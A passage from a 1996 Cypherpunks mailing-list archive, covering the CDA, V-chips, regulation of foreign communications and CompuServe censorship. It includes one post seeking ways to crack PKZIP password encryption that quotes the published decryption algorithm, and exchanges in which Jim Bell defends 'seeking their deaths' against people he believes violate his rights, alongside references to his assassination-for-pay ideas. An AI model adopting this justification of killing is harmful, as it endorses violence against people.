quadrupled in 25 years, is higher than any other civilized nation...

[...]

  It is something of a mystery how so many people got in jail because 
we have it on the testimony of some leading politicians that knavish 
judges are freeing criminals in record numbers. Pat Buchanan babbles 
to anybody who'll listen that federal judges are "an unelected 
elite," solititous of "criminals, atheists, homosexuals, flag 
burners, illegal aliens, convicts and pornographers." I don't know 
why he left out gun molls, blood suckers, snake charmers, pig 
rustlers, serial blackguards, pyromaniacs, and mailbox vandals...

[...]

...There is something more to the point, though, than the disposition 
of politicians to bay moronically at the moon.  If we want a more 
predictable system in which judicial descisions never surprise us, 
then we have perfectly good functioning models from which to choose 
from. Take your pick: China, Cuba, North Korea, Iraq. Any one will 
do.

--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 13 Feb 1996 05:43:17 +0800
To: cypherpunks@toad.com
Subject: Re: China
Message-ID: <199602120410.UAA15696@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:29 AM 2/11/96 -0500, Dr. Dimitri Vulis wrote:
>Bill Stewart <stewarts@ix.netcom.com> writes:
>
>> At 01:54 PM 2/10/96 EST, you wrote:
>> >It's not difficult to imagine that governments will seek to regulate the
>> >possession of modems again. Some may recall that in the U.S. it used to be
>> >technically illegal to connect a modem to the phone jack without a permissio
>> >from AT&T.
>>
>> Actually, permission from the local phone companies, who owned the system,
>> I assume?  (Though I don't actually remember which parts of The Phone Company
>> were involved in the Carterphone decision.)
>
>Nope.  I used modems back when the local phone company _was AT&T. :-)

Back in the really dark ages, we used acoustic couplers (300 b/s max) which
held a telephone handset, so there was no direct connection to the
telephone lines.  The phone company asserted that they were also illegal,
but their argument was kind of weak!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 12 Feb 1996 13:02:03 +0800
To: Deranged Mutant <cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <199602120410.UAA15701@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The Dranged Mutand is far from deranged when he writes:

At 12:09 PM 2/11/96 -0500, Deranged Mutant wrote:
...

>And besides... why rate program just on violence?  Why not "quality" from 
>a variety of orgs?  Other content ratings, from various organizations.  

...

One thing the V-Chip gives us is the argument:  Now that parents have the
ability to control what their children watch, the government should turn
responsibility over to them and butt out.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 12 Feb 1996 12:52:30 +0800
To: ampugh@mci.newscorp.com>
Subject: Re: Strange Sounds of Silence
Message-ID: <199602120410.UAA15745@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Pugh writes:
 > Has anyone else out there noticed the strange sounds of silence
 > emmanating from the american print and broadcast media concerning the
 > rider attached to the Telecommunications Act recently signed by
 > President Clinton known as the CDA (Communications Decency Act)?

There seems to be a wide difference in the way the major media is reporting
this story.  For example, the editorial cartoon in today's (Sunday) San
Jose (California) Mercury News:

Picture: A man dressed in the style of the American Revolution sitting at a
computer.  In the background are a two pictures in ovel frames.  Next to
him on the table are a can of Pepsi and a candle stick.  He is typing at
the keyboard.  The thought baloon above the keyboard says (I substutite
XXXXXX for the areas that are drawn as a censor's block blackout):

"Dear Congressman --

You XXXXXX XXXXXX have really done it this time!  This XXXXXX XXXXXXX
telecommunications bill with its XXXXXX XXXXXXX indecency provision is a
XXXXXX attack on free speech!  You should have your XXXXXXX XXXX dipped in
tar and feathered!
                        tjefferson@aol.com"

Of course the Mercury News a couple of weeks ago announced that it was
going to try to provide first class coverage of cyberspace issues.  I give
it at least a B+ between its coverage of the CDA and the front page
interview with Rich Graves and discussion of the alternate sites to get
around the German censorship of Webcom.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Mon, 12 Feb 1996 09:59:07 +0800
To: cypherpunks@toad.com
Subject: Re: Deafening silence [was Re: Need a "warning" graphic...]
Message-ID: <199602120129.UAA17517@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jim Ray wrote:
> Further, has anyone else noticed a deafening silence on the subject of
> a (supposedly) wished-for line-item veto power of presidents? It seems
> to me that the Dornan and CDA-type provisions of huge bills are line-
> items, aren't they?

No. Line-items refer to budgetary allocations.  If it were part of a 
budget bill that allocated monies, then a line-item veto could zap it.

Those folks really *don't* want a line-item veto now that a different 
party could use it.  I doubt it would ever be more than a rhetorical tool 
since it would limit the allocated pork... even be used as a form of 
political blackmail.

ObCrypto: None.

Rob.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMR6YDSoZzwIn1bdtAQGJNQGAnu5thLwYKNLS/jowaZSwIzQltUCSbgg7
H7D2XDVIJuf/gvpt/cV3R/6VcwE4tvCb
=TtYy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 12 Feb 1996 09:53:23 +0800
To: cypherpunks@toad.com
Subject: re: Regulation of citizen-alien communications
Message-ID: <960211203035.2021bd9f@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Gov does have the right (in fact the duty) to regulate communications 
>> between citizens and non-citizens/sites in other lands

>(not wishing to start a flamewar) Why do you think so ?

"...provide for the common defense"
"To regulate Commerce with foreign nations..."
"...or in adhering to their enemies, giving them Aid and Comfort."

There are the bytes - try reading them in context.

						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Mon, 12 Feb 1996 22:38:35 +0800
To: cypherpunks@toad.com
Subject: Re: Yeah, Yeah But what are we gonna do!
Message-ID: <199602120138.UAA17547@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Richard Harris wrote:
> 
> It may just be me but ...
> 
> i)      This in-fighting and bickering doesn't seem very productive

Agrrreed.
> 
> ii)     What are we gonna do about the CDA?

Does the phrase "Cypherpunks write code" sound familiar....?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMR6aJCoZzwIn1bdtAQGpcgF/SiecyUgW49ll3vqo8G7FPQ2gkVa+6S+D
DBgE2qAdam0lUjJ0WKr+h93APxJUbeSP
=O1UN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@mockingbird.alias.net (Anonymous)
Date: Tue, 13 Feb 1996 01:12:18 +0800
To: medea@alpha.c2.org
Subject: Re: Encryption software
In-Reply-To: <199602120118.RAA22586@infinity.c2.org>
Message-ID: <199602120440.UAA02416@myriad>
MIME-Version: 1.0
Content-Type: text/plain


medea@alpha.c2.org (Medea) wrote:

>  I was telling a friend that I was going to buy a program similar to PC
>Anywhere to be able to communicate between my computer at home and the one
>at the office.  He suggested trying to find a similar program which includes
>encryption.
>  Anyone know of such a program?


I'd use: Linux + ssh + dosemu

You can run your text-based messy-dos programs remotely; I do it all the
time.

If your work computer is not on a tcp/ip network already, then you'll need
to use slip/ppp over the modem, which isn't hard.  Just read the dip manual
and/or pppd man page, it tells you how to set up a slip/ppp account.  Ssh
takes care of all the encryption for your logins and file transfers (scp).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 12 Feb 1996 22:37:24 +0800
To: cypherpunks@toad.com
Subject: Re: Unknown address
Message-ID: <2.2.32.19960211150843.00686434@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:27 AM 02/11/96 GMT, postmaster@warehouse.mn.org
(Postmaster) wrote:
>The user this message was addressed to does not exist at this
site.  Please
>verify the name and domain in the original message that
follows.
>Message was addressed to: SAMUEL.KAPLIN@warehouse.mn.org
>

Anybody besides me getting these things?




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMR3p3sVrTvyYOzAZAQFvogQAmgrbguXgm3WLe9cWrcLVS3MSi5lG7ixP
2QOTmHzJULZOlbsaNQiPfclPpZzCEkamSXqgf6rA/+gJ0ENIZ1RH3ffUZOCGCHci
+HzM8gcK6itFchYacV5+q4dg53QReSKblVB3TSS5wqLBvUkoLAgEtJhcm4kcLzYp
w3fWBTC0QFc=
=UHEO
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: deepthroat@alpha.c2.org
Date: Tue, 13 Feb 1996 01:09:05 +0800
To: cypherpunks@toad.com
Subject: X509 (was: Strange Sounds of Silence)
Message-ID: <199602120519.VAA28144@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>>implementing the basic encoding rules, used in the PCKS and X.509 - 
>>can someone give me a pointer to where I can find a 
>>copy of v3 online?
>
>It's not available online.  ISO specs are hardcopy (and hard currency :)
>only.
>

If you listen closely, you can hear pages of an ISO standard being
scanned.

DT




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Tue, 13 Feb 1996 01:10:38 +0800
To: cypherpunks@toad.com
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <m0tlrTi-000V6OC@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

There is nothing to add. But in summary I warn the net community not 
to be caught acting like the teenager that has decided that mom & 
dad know nothing and it doesn't matter that they cared for us all 
these years.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMR7ZqnZBD5a0GJkxAQHNKQP+O6rAisJgDHYMQW+t5DmEuLO5xjoOIq3Z
D2pteLa/9bsgvs9e5nKRLTGYD0AJWrX2uQGqeMmYFNIykchqp6zD52z5IkDi/slk
L8Ip4MFc6F17kmbx1I+yq9TeTUSn2SKY4p7fIa1yY4UKI2zD+hCG6xur5D+DIovH
kVD3RxXVsRw=
=WxNL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 12 Feb 1996 15:21:16 +0800
To: cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <2.2.32.19960212061802.00915f98@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 PM 2/11/96 -0800, Bill Frantz wrote:
>The Dranged Mutand is far from deranged when he writes:
>
>At 12:09 PM 2/11/96 -0500, Deranged Mutant wrote:
>...
>
>>And besides... why rate program just on violence?  Why not "quality" from 
>>a variety of orgs?  Other content ratings, from various organizations.  
>
>...
>
>One thing the V-Chip gives us is the argument:  Now that parents have the
>ability to control what their children watch, the government should turn
>responsibility over to them and butt out.

Parents had that ability before.  Cable boxes have a "perental control key"
on the side that enables them to lock out "offensive" channels.  It works
quite well and is fairly hard for the kidlets to defeat.  (I used it to
lockout the religious stations and home shopping channels.)

The "V-Chip" debate is a mirror of the one that occured when the cable
channels were starting to become popular.  There was a big hue and cry about
kids getting to the "naughty" channels without parent concent.  Seems most
people do not even learn how the lockouts work.  (And are too lazy to learn.)

You have to remember that most of the people arguing for TV filters are
looking for a way to make the "offensive" stuff go away for good.  (Either
from some sort of rating system or a heavy handed FCC regulation or two.)
And don't believe that the V-Chip will let you choose the rating service.
It will be one centrally produced rating from some faceless and nameless
entity.  I am willing to bet that we will see some pretty absurd examples of
ratings (mild things getting heavy ratings above and beyond the call of
sanity) in the future.

The v-chip will be less than useful as a real filter tool for those of us
who have a different worldview than the censors.

Remember: "Future events like these will happen to you in the future!"
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Tue, 13 Feb 1996 04:44:09 +0800
To: "David K. Merriman" <cypherpunks@toad.com
Subject: Re: Unknown address
Message-ID: <m0tlrhc-000V78C@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


> >The user this message was addressed to does not exist at this
> site.  Please
> >verify the name and domain in the original message that
> follows.
> >Message was addressed to: SAMUEL.KAPLIN@warehouse.mn.org
> >
> 
> Anybody besides me getting these things?
> 
Seems he does exist. I got one too.

Another "Logical Conclusion" by:
Tim Cook <twcook@cts.com>
Support THE US Constitution...
Vote Alexander in '96 and '00!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 12 Feb 1996 12:05:37 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: Strange Sounds of Silence
Message-ID: <9602120339.AA11984@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



>implementing the basic encoding rules, used in the PCKS and X.509 - 
>can someone give me a pointer to where I can find a 
>copy of v3 online?

It's not available online.  ISO specs are hardcopy (and hard currency :)
only.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 12 Feb 1996 15:54:26 +0800
To: extropians@extropy.org
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <199602120645.WAA16681@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:54 PM 2/11/96 PST, strata@virtual.net wrote:
>Oh, let's start right off pretending that 
>a) the net is an independently funded entity with no government
>infrastructure 

No pretence.  It is, and it has been for some time.

Your other arguments casually dismiss the very real power that large numbers 
of able people with good communications can exercise, have just exercised
very recently.

Nation states are a new creation.  In the past many different 
kings ruled many different bits of one nation, and one king often 
ruled parts of more than one nation.

Today nation states are almost universal, and people can no longer 
imagine what a nation is, other than a nation state.  But the net 
is a nation, and is not a state, and nationalism is a force that 
governments usually cannot withstand.

What makes a government strong is its cohesion, but the state cannot
create its own cohesion.  When states attempted to confront nationalism, 
they often lost cohesion and vanished altogether, like a string of sand. 

The "Nation state" is in essence a tactic for avoiding this hazard.
 
Governments are acutely aware of this problem, and act very cautiously 
in the face of such threats.  Many people seem to imagine that a 
government innately and naturally has cohesion, that it is naturally 
one thing, naturaly capable of acting coherently and cohesively as 
an individual can.  On the contrary, governments maintain their 
cohesion with difficulty, and continually act, or refrain from acting,
in fear that they might lose it.

In an all out knock down battle between a particular government and the
internet, in a state where a substantial proportion of the middle class
was on the internet, the government would be in serious danger of evaporating 
like a jellyfish in the sunshine.

The government can get away with a substantial amount of harassment and 
restraint, but has only limited power to act without itself being acted 
on, to change the world without itself suffering change.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 11 Feb 1996 20:31:44 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602111200.XAA00164@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


>From proff Sat Feb 10 18:09:57 1996
Subject: new zip cracking code
To: cypherpunks@toad.com
Date: Sat, 10 Feb 1996 18:09:57 +1100 (EST)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 3806      

Does anyone have any pointers to cryptanalysis papers on the Zip
encryption scheme (presented below)? I've seen a few MSDOS executeables
which used some sort of brute force attack, which didn't seem
particularly intelligent or effective for long passwords. If anyone has
some pointers, or source I'd be glad to hear of it. From what I can see
of Schlafly's algorithm a bute force attack could be speed up a great
deal by pre-compution and expansaion of elements of the first 3 or so
rounds at the very least.

Ideas anyone?


Decryption
----------

The encryption used in PKZIP was generously supplied by Roger
Schlafly.  PKWARE is grateful to Mr. Schlafly for his expert
help and advice in the field of data encryption.

PKZIP encrypts the compressed data stream.  Encrypted files must
be decrypted before they can be extracted.

Each encrypted file has an extra 12 bytes stored at the start of
the data area defining the encryption header for that file.  The
encryption header is originally set to random values, and then
itself encrypted, using 3, 32-bit keys.  The key values are 
initialized using the supplied encryption password.  After each byte
is encrypted, the keys are then updated using psuedo-random number
generation techniques in combination with the same CRC-32 algorithm 
used in PKZIP and described elsewhere in this document.

The following is the basic steps required to decrypt a file:

1) Initialize the three 32-bit keys with the password.
2) Read and decrypt the 12-byte encryption header, further
   initializing the encryption keys.
3) Read and decrypt the compressed data stream using the
   encryption keys.


Step 1 - Initializing the encryption keys
-----------------------------------------

Key(0) <- 305419896
Key(1) <- 591751049
Key(2) <- 878082192

loop for i <- 0 to length(password)-1
    update_keys(password(i))
end loop


Where update_keys() is defined as:


update_keys(char):
  Key(0) <- crc32(key(0),char)
  Key(1) <- Key(1) + (Key(0) & 000000ffH)
  Key(1) <- Key(1) * 134775813 + 1
  Key(2) <- crc32(key(2),key(1) >> 24)
end update_keys


Where crc32(old_crc,char) is a routine that given a CRC value and a 
character, returns an updated CRC value after applying the CRC-32 
algorithm described elsewhere in this document.


Step 2 - Decrypting the encryption header
-----------------------------------------

The purpose of this step is to further initialize the encryption
keys, based on random data, to render a plaintext attack on the
data ineffective.


Read the 12-byte encryption header into Buffer, in locations
Buffer(0) thru Buffer(11).

loop for i <- 0 to 11
    C <- buffer(i) ^ decrypt_byte()
    update_keys(C)
    buffer(i) <- C
end loop


Where decrypt_byte() is defined as:


unsigned char decrypt_byte()
    local unsigned short temp
    temp <- Key(2) | 2
    decrypt_byte <- (temp * (temp ^ 1)) >> 8
end decrypt_byte


After the header is decrypted, the last two bytes in Buffer
should be the high-order word of the CRC for the file being
decrypted, stored in Intel low-byte/high-byte order.  This can
be used to test if the password supplied is correct or not.


Step 3 - Decrypting the compressed data stream
----------------------------------------------

The compressed data stream can be decrypted as follows:


loop until done
    read a charcter into C
    Temp <- C ^ decrypt_byte()
    update_keys(temp)
    output Temp
end loop



-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 13 Feb 1996 05:40:43 +0800
To: ecarp@netcom.com
Subject: Re: "Rights"
Message-ID: <2.2.32.19960212041306.008201e0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 AM 2/10/96 -0600, Ed Carp wrote:
>> Remedy exists. If you do not like the rules at one site, choose another. In
>
>What happens when there *is* no remedy, when there are no other sites to 
>go to, when there are no employers who would refrain from violating an 
>employee's privacy?  What then?

Ed, there are hardly likely to be much of a reduction in ISPs from the
current 7K.  Hard for an employer to track your use if you switch to a radio
modem after booting your machine without the network drivers to cut off
eavesdropping.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomservo@access.digex.net (Scott Fabbri)
Date: Mon, 12 Feb 1996 13:15:37 +0800
To: cypherpunks@toad.com
Subject: re: Regulation of citizen-alien communications
Message-ID: <v02130504ad4465a2712e@[206.161.73.153]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Note: my references to the Constitution are from
http://atl46.atl.msu.edu/atl/reh/battle/u.s.con.html

"A. Padgett Peterson P.E. Information Security" writes:
>>> Gov does have the right (in fact the duty) to regulate communications
>>> between citizens and non-citizens/sites in other lands

lmccarth@cs.umass.edu replies:
>>(not wishing to start a flamewar) Why do you think so ?

"A. Padgett Peterson P.E. Information Security" replies:

>"...provide for the common defense"

(From the Preamble) So, if it isn't related to the "common defense," this
doesn't apply.

>"To regulate Commerce with foreign nations..."

(Article I, Section 8) My dictionary claims "commerce" is  "the buying or
selling of goods, esp. when done on a large scale between cities, states,
or nations" (primary definition, anyway). If you can convince someone that
"social intercourse" (secondary definition) is what the Founding Fathers
really meant, your argument carries more weight.

>"...or in adhering to their enemies, giving them Aid and Comfort."

(Article III, Section 3, clause 1)

Doesn't say anything about them being foreign or domestic. Theoretically
everyone who participated in the Confederate cause during the War Between
The States :^) committed treason -- but that's another argument.

>There are the bytes - try reading them in context.

Hmm. I did, but wasn't edified. It seems to me that Tim May's commentary is
dead on. Maybe a more appropriate statement would be:

     "The government has the power (_not_ the right) to regulate
     communications between citizens and non-citizens / sites in other
     lands under narrowly defined circumstances."

If you're not engaging in espionage, trading with countries like Libya or
Iraq, or committing treason, it doesn't sound like there's any reason for
the government to regulate your communications with non-citizens (at least
from a Constitutional point of view). That may not stop them from trying to
vacuum them up off the Internet, though. :-)

Scott

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMR7Aq+vEnOI8TfM9AQH+vQMAjL/+IGDKKz9M1WB6LdeswpEVUWmLq+4i
qTrPH4pci8gkU3fH1O893xmWMCHbVCYywazk4tF69wyLV6WvWlNSOyYRW1S7xiq1
24PFoBpD7yLpDguTB2UEU1b9HxwZ017y
=Wus/
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Mon, 12 Feb 1996 13:46:06 +0800
To: cypherpunks@toad.com
Subject: re: Regulation of citizen-alien communications
Message-ID: <9602120445.AB24132@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Somebody wrote:

>>> Gov does have the right (in fact the duty) to regulate communications 
>>> between citizens and non-citizens/sites in other lands
>
>>(not wishing to start a flamewar) Why do you think so ?

and Padgett replied:

>"...provide for the common defense"
>"To regulate Commerce with foreign nations..."
>"...or in adhering to their enemies, giving them Aid and Comfort."

I agree with the first point.
My english is not sufficient to understand point three.

Govts have no powers on other govts.
So why in the hell would it be the job of govt to regulate commerce with foreign 
nations?

They might help their citizens (seing that their rights and terms of any contract are 
respected, but calling what they do "regulating commerce btwn nations" is an euphemism
for holding international businessman on a leash!


Regards to all Cyphering Punks

JFA

And personnal comment to Padgett:
Backward, you said?  Nahhh...  :)
Regards!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 12 Feb 1996 15:14:11 +0800
To: cypherpunks@toad.com
Subject: Attitudes toward the government...
Message-ID: <ad441a994e021004b38a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Jim Ray wrote:

>"Americans hate the IRS, and if the only way they can get rid of it
> is to elect somebody who is communicating directly with the Planet
> Xorgon, then so be it." -- Dave Barry [on Steve Forbes]. 2/9/96

Not just this, but another data point about the current sentiment about
Washington: In a movie theater today there was a preview of the upcoming
movie "Independence Day," showing a flying saucer hovering over the White
House, then destroying it. The audience cheered and clapped.

I'm not sure this would've happened in, say, the early 1950s.

(However, like the early 1950s, the producers of this upatriotic drivel may
have to answer to the House Un-American Activities Committee, to explain
their Indecent portrayal.)

--Tim May

(P.S. "Broken Arrow" was a fun flick. Sort of like "Fail Safe " on "Speed.")

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Tue, 13 Feb 1996 01:05:42 +0800
To: cypherpunks@toad.com
Subject: Re: Unknown address
Message-ID: <9602120448.AA24390@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



>>Message was addressed to: SAMUEL.KAPLIN@warehouse.mn.org
>>
>
>Anybody besides me getting these things?


Yes!  I got that too!

JFA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 12 Feb 1996 17:05:12 +0800
To: cypherpunks@toad.com
Subject: Re: The Emotional Killer (or out of the frying pan and into the electric chair?)
Message-ID: <m0tlsr9-0008z2C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:59 PM 2/11/96 -0500, tallpaul wrote:
>I want to write on the theme posted to the list in the message below where
>J. Bell wrote "It is their ACTIONS that I feel violate my rights; that is
>what justifies my seeking their deaths, should I choose to do so." 
> 
>First, one thing that marks the sane adult from the child and the floridly
>psychotic adult is the sane adult's knowledge that "feelings" and "facts"
>are two different things. 
> 
>It is one thing to "feel," as J. Bell or all of us might, that our rights
>have been violated. 
> 
>It is another thing to maintain, as J. Bell uniquely appears to do, that
>the "feeling" gives him the right to seek another person's death. 

You're clearly confused. I was responding to an accusation that I was
defending seeking somebody's death simply because of a disagreement of
OPINION.  My comment was intended to remind the reader that it is the
ACTIONS of a person which justify the self-defense; not simply the
disagreement.  

You falsely imply that a person can't be correct in his assessment that his
rights were, indeed, violated.


> 
>This and other posts by J. Bell and other lib'bers lead me to believe that
>their claimed interest in human freedom for everyone is little more than a
>cover for a set of authoritarian expectations that they can do whatever
>they want, free from any control, responsibility, or accountability. 

Since you just got through misrepresenting my position, probably
intentionally, it's pretty hard to take the rest of your opinions seriously.


>The argued centrality of J. Bell's "feelings" over other people's lives is
>something that puts him in the god category. (Thankfully J. Bell is not one
>of the dreaded tax collectors or "socialist statists.") 

You're wrong yet again.  Let's see, tallpaul needs a logic lesson:

Let's suppose I _believe_ my rights are being violated.  While that, in
itself, does not guarantee that this is CORRECT, on the other hand it
doesn't mean that it is INCORRECT, either.  You're falsely implying that I
was ignoring the issue of correctness; I wasn't.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 13 Feb 1996 01:13:11 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Chinese/Indian censorship of alt.sex.* etc. (Was: China)
Message-ID: <v02140b00ad434d2d8588@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:03 2/10/96, lmccarth@cs.umass.edu wrote:

>The CompuServe incident caused a big ruckus because it involved a conflict
>between the German govt. and many U.S. users, and (like it or not) users
>in the U.S. seem to be the most vocal group on the net.

The ruckus was also due to CIS's ignoring the need to be able to suppress
access to newsgroups based on the user's Gateway node. If this ability had
been designed into the code before it was released, then the German users
could have been isolated [without affecting non-German Users] just as fast
as the newsgroups were flagged as "Invisible" for display to German
Gateways (the current CIS support requires the user to select from a CIS
Generated and Supplied list so the list could not display certain NG's
names [given the support for this capability]). This need to suppress
access to German Users did not suddenly become a requirement with this
incident since CIS was on notice for at least 2 years that the German
Government felt they were entitled to censor what was supplied by CIS to
German Users (that time it was due to a game that used the Swastika). Given
this precedence, it would seem to be obvious that there would be the need
to tailor the listings based on "Community Standards" (since the German
Government is touchy about access to certain types of material such as
Revisionism and the Holocaust). In fact, given their laws and mindset, I
find it odd that neither of the following were on their list of newsgroups
that wanted blocked (I'm sure that I could find more if I scanned the list
of newsgroups <g>):

alt.revisionism
soc.culture.jewish.holocaust






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 13 Feb 1996 04:45:45 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <199602120753.XAA04763@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:18 PM 2/11/96 -0800, Alan Olsen wrote:
...
>You have to remember that most of the people arguing for TV filters are
>looking for a way to make the "offensive" stuff go away for good.

Absolutely!  But the technology that lets individuals make the choice
weakens their argument that the government must take a hand.


>The v-chip will be less than useful as a real filter tool for those of us
>who have a different worldview than the censors.

Again, absolutely.  Hell, I can't even devise a filter that will let me
filter out Jim Bell's rants while letting me see his reasoned arguments on
anonymous assassination.  (I would love to have him address the Salman
Rushdie issue, a man who is still alive despite a considerable announced
price for his head.  There appear to be limits to who can be subject to
assassination for pay.)

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Feb 1996 04:45:52 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Regulation of citizen-alien communications
Message-ID: <m0tlsz8-000907C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:21 AM 2/12/96 -0500, lmccarth@cs.umass.edu wrote:
>Padgett writes:
